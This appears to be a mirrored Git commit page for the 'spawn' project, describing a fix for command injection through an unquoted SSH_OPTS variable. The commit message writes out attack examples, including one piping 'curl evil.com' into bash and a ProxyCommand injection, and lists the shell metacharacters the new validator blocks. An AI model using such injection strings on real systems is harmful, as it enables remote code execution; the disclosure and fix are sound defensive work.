mirror of
https://github.com/OpenRouterTeam/spawn.git
synced 2026-05-07 17:31:04 +00:00
42808ae101
HIGH severity fix for command injection vulnerability. The SSH_OPTS environment variable was used unquoted in multiple ssh/scp commands throughout the codebase. While intentionally unquoted to allow multiple options, this created a command injection risk if an attacker could control the SSH_OPTS environment variable. Attack vector: export SSH_OPTS="-o ProxyCommand='bash -c whoami'"; ./cloud/agent.sh export SSH_OPTS="; curl evil.com | bash #"; ./cloud/agent.sh Impact: Remote code execution on the user's machine when running any spawn script with a malicious SSH_OPTS value. Fix: Added _validate_ssh_opts() function that blocks shell metacharacters (; | & \` $ ( ) < >) in SSH_OPTS. If validation fails, secure defaults are used instead. Tested validation against: - Semicolon injection (;) - Pipe injection (|) - Backtick injection (\`) - Command substitution ($()) - Background execution (&) - Redirection (< >) Files changed: - shared/common.sh: Added validation function and enforcement Agent: security-auditor Co-authored-by: Spawn Refactor Service <refactor@spawn.service> Co-authored-by: Claude Sonnet 4.5 <noreply@anthropic.com> |
||
|---|---|---|
| .. | ||
| common.sh | ||
| github-auth.sh | ||
| key-request.sh | ||